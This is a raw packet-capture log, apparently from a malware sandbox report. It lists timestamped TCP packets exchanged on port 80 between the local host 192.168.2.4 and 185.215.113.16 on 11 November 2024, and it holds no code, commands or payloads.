Nov 11, 2024 01:14:23.316190958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316200972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316204071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316215992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316225052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316227913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316251040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316262007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316262960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316273928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316284895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316298008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316308975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316314936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316314936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316323996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316335917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316344976 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316348076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316360950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316391945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316400051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316411972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316422939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316445112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316462994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316560030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316571951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316582918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316595078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316605091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316612959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316618919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316627026 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316631079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316643953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316644907 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316654921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316668987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316669941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316699982 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316704988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316715002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316716909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316730022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316741943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316746950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316752911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316770077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316777945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316791058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316798925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316802025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316814899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316831112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316837072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316849947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316859007 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316862106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316870928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316874981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316889048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316899061 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316931963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316977978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316989899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317001104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317012072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317019939 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317023993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317038059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317045927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317049026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317070007 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317096949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317126989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317146063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317157030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317167997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317168951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317181110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317193031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317194939 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317203045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317215919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317225933 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317226887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317241907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317243099 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317255020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317260981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317280054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317289114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317295074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317306995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317318916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317318916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317333937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317342997 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317374945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317425013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317436934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317447901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317459106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317465067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317467928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317471981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317478895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317490101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317501068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317521095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317548990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317594051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317605019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317614079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317625046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317636967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317640066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317650080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317651033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317662954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317675114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317683935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317687988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317699909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317704916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317722082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317732096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317739010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317744970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317766905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317787886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317903042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317915916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317925930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317939043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317948103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317950010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317962885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317974091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317980051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317985058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.317989111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.317996979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318010092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318017960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318023920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318042040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318044901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318053961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318064928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318070889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318077087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318089962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318100929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318104029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318104982 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318114996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318120956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318128109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318140030 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318169117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318169117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318181992 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318187952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318195105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318205118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318217039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318219900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318228006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318234921 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318234921 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318240881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318254948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318265915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318269014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318278074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318289995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318294048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318311930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318312883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318320990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318325996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318339109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318347931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318351984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318362951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318372011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318375111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318380117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318387985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318402052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318408966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318413019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318425894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318437099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318439960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318449974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318459988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318463087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318476915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318483114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318489075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318507910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318514109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318543911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318617105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318634987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318645954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318658113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318666935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318666935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318676949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318686962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318690062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318702936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318712950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318715096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318733931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318737984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318753004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318753958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318766117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318775892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318788052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318789959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318797112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318799973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318813086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318825006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318826914 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318840027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318852901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318866014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318885088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318895102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318898916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318911076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318922997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318924904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318936110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.318947077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.318977118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319015980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319029093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319040060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319051981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319061041 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319062948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319072962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319076061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319088936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319098949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319103003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319116116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319128990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319132090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319154024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319154978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319165945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319175005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319178104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319192886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319210052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319211006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319219112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319252968 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319317102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319329977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319343090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319354057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319365025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319370031 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319370031 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319376945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319382906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319416046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319474936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319487095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319497108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319509983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319519043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319523096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319535971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319540977 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319549084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319561005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319567919 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319571972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319578886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319591999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319596052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319613934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319613934 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319627047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319633961 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319638968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319653034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319660902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319664955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319677114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319689989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319700003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319729090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319756985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319768906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319775105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319781065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319793940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319802046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319806099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319818020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319828987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319828987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319842100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319852114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319854021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319865942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319875002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319884062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319895029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319900990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319906950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319921017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.319930077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319952011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.319974899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.320063114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320080996 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320094109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320102930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.320106030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320118904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320121050 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.320132017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320142984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320147991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.320156097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320168018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.320178032 CET	49762	80	192.168.2.4	185.215.113.16
